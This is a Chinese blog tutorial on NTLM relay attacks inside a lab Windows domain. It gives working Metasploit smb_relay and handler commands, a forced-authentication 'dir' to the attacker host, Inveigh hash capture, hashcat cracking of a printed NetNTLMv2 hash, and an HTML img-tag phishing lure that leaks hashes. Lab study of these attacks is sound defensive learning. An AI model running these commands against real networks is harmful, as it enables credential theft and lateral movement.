第134天:内网安全-横向移动&NTLM-Relay重放&Responder中继攻击&Ldap&Ews

最新推荐文章于 2024-08-22 19:51:07 发布
最新推荐文章于 2024-08-22 19:51:07 发布
阅读量397 收藏 10
点赞数 19
文章标签: 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_71529930/article/details/141404044
版权

本节案例适用于不能获得域控密码和hash的情况

案例一:横向移动-NTLM 中继攻击-Relay 重放-SMB 上线

前置知识点:

域用户jie 123.com    本地管理员 adminstrator  123.com

域控用户  administrator  123.com

利用用户jie去访问admin的时候

 利用administrator去访问admin的时候

这是因为当密码一致的时候会自动匹配,然后直接登录

 实验图解(这个图是后面加的可能与下面略有不同,主要看原理)

让jie用户登录上线cs

提权到system

然后需要让他转发到msf上,这里cs4.5版本不能执行

msf开启监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 0.0.0.0
set lport 8888
exploit

转发到msf上

添加路由

run autoroute -p ##查看当前路由表
run post/multi/manage/autoroute ##添加当前路由表

msf设置模块

use exploit/windows/smb/smb_relay
set smbhost 192.168.3.21   #攻击目标
set lhost 192.168.172.131   #设置本地 IP
set autorunscript post/windows/manage/migrate
set payload windows/meterpreter/bind_tcp  ##设置正向连接
set rhost 192.168.3.21 #设置连接目标(因为是正向连接于之前一致)
run

先在且换win2008的administrator用户,执行下面的命令(ip为kali的ip)

dir  \\192.168.172.131\c$

成功可以导出hash但是无法获得会话

这个hash可以利用hashcat去破解,具体使用方法看一下案例二

案例二:横向移动-NTLM 中继攻击-Inveigh 嗅探-Hash 破解

项目下载地址:
https://github.com/hashcat/hashcat/

https://github.com/Kevin-Robertson/Inveigh

本地操作方法

运行客户端

找另一台主机dir访问这台服务器

会显示他的hash

 hash会保存生成在lnveigh-ntlmv2文件夹当中

 破解hash

注意利用hashcat的时候要求运行内存足够高,我这里直接设置了运行内存为8g,8个处理器

hashcat -m 5600 Administrator::WEBSERVER:A3E1A07FAB4F681A:AF53B80809E25BE9E591916DA31BA5A3:010100000000000027DD583630F4DA0169F4977029CE59BF000000000200060047004F00440001001A004F0057004100320030003100300043004E002D0047004F00440004000E0067006F0064002E006F007200670003002A004F0057004100320030003100300043004E002D0047006F0064002E0067006F0064002E006F007200670005000E0067006F0064002E006F00720067000700080027DD583630F4DA0106000400020000000800300030000000000000000000000000300000070037ADC6916D7F76A3ABF8CA8BD067417BF64A629CB03B3B8C6EC0CB4C665B0A001000000000000000000000000000000000000900220063006900660073002F003100390032002E003100360038002E0033002E0032003100000000000000000000000000 pass.txt

 

msf上运行

利用获取到的会话执行shell命令

到对应目录下去执行工具,但是这里会有一个问题,不知道为啥会默认执行公网网卡进行了监听,我的目的是让他内网网卡执行,这里没办法只能给目标加张公网网卡去实现,正常的话就直接让主机去执行dir命令就完事了

 

 然后让别的主机去访问它获得hash,

还支持不同的协议,钓鱼触发

<!DOCTYPE html>
<html>
<head>
  <title></title>
</head>
<body>
  <img src="file:///\\192.168.3.32\2">
</body>
</html>

 

xiaojiesec
关注
  • 19
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
第68内网安全-域横向PTH&PTK&PTT哈希票据传递1
08-03
内网安全是一个重要的议题,尤其是在企业环境中,域横向PTH、PTK、PTT哈希票据传递是其中的关键攻击手段。这些方法主要针对Kerberos协议的弱点,利用NTLM哈希、Kerberos票据和AES密钥来绕过认证过程,从而在内部网络...
红队内网攻防渗透:内网渗透之内网对抗:横向移动篇&入口差异&切换上线&IPC管道&AT&SC任务&Impacket套件&UI插件
06-22
本文将深入探讨“红队内网攻防渗透”,重点介绍内网对抗中的横向移动策略、不同入口差异、上线切换技巧,以及利用IPC管道、AT任务、SC服务、Impacket工具套件和UI插件等技术手段。 首先,横向移动内网渗透的关键...
11、内网安全-横向移动&NTLM-Relay重放&Responder中继攻击&Ldap&Ews
m0_65842464的博客
02-21 875
内网中一台主机上线后,输入命令:dir \\192.168.46.166\c$,kali(192.168.46.166) msf的smb_r。模块做了一个转发攻击,即中继攻击,转发至192.168.3.32,最终使192.168.3.32上线到MSF。migrate 1992 #1992是PID号,所需用户权限的PID。二、横向移动-NTLM中继攻击-Inveigh嗅探-Hash破解。CS上线后,system高权限用户切换至低权限用户。MSF上线后, 高权限用户切换低权限用户。
内网安全横向移动&NTLM-Relay重放&Responder中继攻击&Ldap&Ews
今天是几号的博客
04-02 1062
攻击者伪造一个恶意的SMB服务器,当内网中有机器Client1(webserver)访问这个攻击者精心构造好的SMB服务器时, smbrelayx.py 脚本将抓到 Client1 的 Net-NTLM Hash ,然后 smbrelayx.py 用抓取到的 Client1 的 Net-NTLM Hash 重放给 Client2(sqlserver)。Exchange,LLMNR投毒,
内网横向移动NTLM-Relay重放&Responder中继攻击&Ldap&Ews
剁椒鱼头没剁椒的博客
07-30 1123
在正常CS或者MSF上线的时候,我们的目标通常是普通用户上线,如何提权到system权限,但是有时候需要使用到administrator,就会导致我们没有会话去连接,那么这里就是介绍一下,如何切换会话中的权限,同时要注意的是,低权限会话是无法切换至高权限的,但是高权限能够切换至低权限,相当于system权限能够切换到administrator,但是webadmin权限是无法切换至administrator权限的,这个是需要注意的。看配置是需要4h4g…
内网渗透之横向移动NTMLRelay(中继)攻击-Inveigh&NTLM-Relay重放
m0_62207170的博客
05-01 1060
内网渗透之横向移动NTMLRelay(中继)攻击-Inveigh&NTLM-Relay重放
Nim-SMBExec:Nim中的SMBExec实现-使用NTLM身份验证和Pass-The-Hash技术的SMBv2
02-03
Nim-SMBExec 是一个基于 Nim 语言的工具,它实现了 SMB(Server Message Block)协议的一个功能,允许远程执行命令,特别关注Windows系统的安全性。这个工具利用了NTLM(NT LAN Manager)身份验证和Pass-The-Hash...
EWS-for-iOS:iOS的 Exchange Web Service (EWS) 框架
05-10
2. **身份验证机制**:框架支持NTLM、基本认证和OAuth 2.0,以确保安全连接到Exchange Server。 3. **异步操作**:大多数EWS操作都是异步进行的,以避免阻塞UI并提高用户体验。 4. **错误处理**:提供丰富的错误...
AI安全-文生图
深度安全实验室
08-15 487
AI安全-文生图
数采网关面临的安全挑战
编程之道在明明德在亲民在止于至善
08-22 214
数采网关面临的安全挑战
92.WEB渗透测试-信息收集-Google语法(6)
最新发布
计算机王的博客
08-22 105
web渗透测试
华为账号“一键登录”能力让美团用户尽享安全便捷的登录体验
HarmonyOS SDK闭源开放能力技术团队
08-19 593
3.将获取到的匿名手机号设置给下面PreviewLoginButtonPage示例代码中的quickLoginAnonymousPhone变量,调用LoginWithHuaweiIDButton组件,实现应用自己的登录页面,并展示华为账号一键登录按钮和华为账号用户认证协议(Account Kit提供跳转链接,应用需实现协议跳转,参见约束与限制第2点),用户同意协议并点击一键登录按钮后,可获取到Authorization Code,将该值传给应用服务器用于获取用户信息(完整手机号、UnionID)。
API容易被攻击,如何做好API安全
dexunyun的博客
08-20 758
当前,API已成为全球重要 IT 基础设施的基石。由此,了解API安全风险以及采用WAAP解决方案等防护措施等,帮助企业构筑API安全防线,确保API安全,为维护企业安全以及业务的正常运行,确保企业可持续发展有着重要的意义。
远程访问安全:rsync、ProFTPD、OpenSSH和VNC漏洞分析
2301_80064376的博客
08-15 2067
ProFTPD是ProFTPD团队的一套开源的FTP服务器软件。该软件具有可配置性强、安全、稳定等特点。ProFTPD 1.3.5中的mod_copy模块允许远程攻击者通过站点cpfr和site cpto命令读取和写入任意文件。任何未经身份验证的客户端都可以利用这些命令将文件从文件系统的任何部分复制到选定的目标。复制命令使用ProFTPD服务的权限执行,默认情况下,该服务在“nobody”用户的权限下运行。
Gartner发布2024年终端和工作空间安全成熟度曲线:24项相关技术发展和应用状况及趋势
lurenjia404的博客
08-22 592
由于攻击者使用人工智能来增强网络钓鱼和终端攻击,企业需要高级安全措施来阻止入侵行为。此技术成熟度曲线可帮助安全和风险管理领导者识别可增强终端和工作空间保护的技术。
服务器数据总是被恶意删除,日常该如何做好安全防范?
kk_177803619的博客
08-22 459
三、部署防火墙和入侵检测系统 防火墙可以隔离受保护的服务器和公共网络之间的数据流,防止未经授权的访问和数据泄露。企业应定期为员工提供网络安全培训,提高员工的安全意识和技能,使他们能够识别潜在的网络攻击安全威胁,并采取适当的措施保护服务器数据。保护服务器数据安全需要采取多方面的措施。通过定期备份数据、强化访问控制、部署防火墙和入侵检测系统、安装防病毒软件和主机安全软件、定期审计和漏洞扫描以及加强员工培训和安全意识等措施的有机结合,可以显著提升服务器数据的安全性,为企业的稳健运营提供有力保障。
结合量子技术解决数据传输安全
编程之道在明明德在亲民在止于至善
08-22 835
结合量子技术解决数据传输安全
移植curl但是zlib无法使能,如何解决该问题 Host setup: arm-unknown-linux-gnueabihf Install prefix: /opt/rootfs/curl-7.79.0/curl-7.79.0/_install Compiler: arm-linux-gnueabihf-gcc CFLAGS: -Werror-implicit-function-declaration -O2 -Wno-system-headers -pthread CPPFLAGS: -isystem /opt/rootfs/openssl-1.1.1/openssl-1.1.1/_install/include LDFLAGS: -L/opt/rootfs/openssl-1.1.1/openssl-1.1.1/_install/lib LIBS: -lssl -lcrypto -ldl -lpthread curl version: 7.79.0 SSL: enabled (OpenSSL) SSH: no (--with-{libssh,libssh2}) zlib: no (--with-zlib) brotli: no (--with-brotli) zstd: no (--with-zstd) GSS-API: no (--with-gssapi) GSASL: no (libgsasl not found) TLS-SRP: enabled resolver: POSIX threaded IPv6: enabled Unix sockets: enabled IDN: no (--with-{libidn2,winidn}) Build libcurl: Shared=yes, Static=yes Built-in manual: enabled --libcurl option: enabled (--disable-libcurl-option) Verbose errors: enabled (--disable-verbose) Code coverage: disabled SSPI: no (--enable-sspi) ca cert bundle: no ca cert path: no ca fallback: no LDAP: no (--enable-ldap / --with-ldap-lib / --with-lber-lib) LDAPS: no (--enable-ldaps) RTSP: enabled RTMP: no (--with-librtmp) PSL: no (libpsl not found) Alt-svc: enabled (--disable-alt-svc) HSTS: enabled (--disable-hsts) HTTP1: enabled (internal) HTTP2: no (--with-nghttp2, --with-hyper) HTTP3: no (--with-ngtcp2, --with-quiche) ECH: no (--enable-ech) Protocols: DICT FILE FTP FTPS GOPHER GOPHERS HTTP HTTPS IMAP IMAPS MQTT POP3 POP3S RTSP SMB SMBS SMTP SMTPS TELNET TFTP Features: AsynchDNS HSTS HTTPS-proxy IPv6 Largefile NTLM NTLM_WB SSL TLS-SRP UnixSockets alt-svc
06-13
根据你提供的信息,发现curl编译时未启用zlib支持。可以尝试用以下方式解决该问题: 1. 确认已经安装了zlib库和头文件。 2. 在编译curl时,添加 --with-zlib 选项启用zlib支持。如: ``` ./configure --with-zlib=/path/to/zlib ``` 其中 /path/to/zlib 是 zlib 库的安装路径。 3. 如果上述方法仍然无法解决问题,可以尝试手动设置 CPPFLAGS 和 LDFLAGS 变量,指定 zlib 头文件和库的路径。如: ``` export CPPFLAGS="-I/path/to/zlib/include" export LDFLAGS="-L/path/to/zlib/lib" ./configure ``` 如果仍然无法解决问题,可以尝试升级或重新编译 zlib 库。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值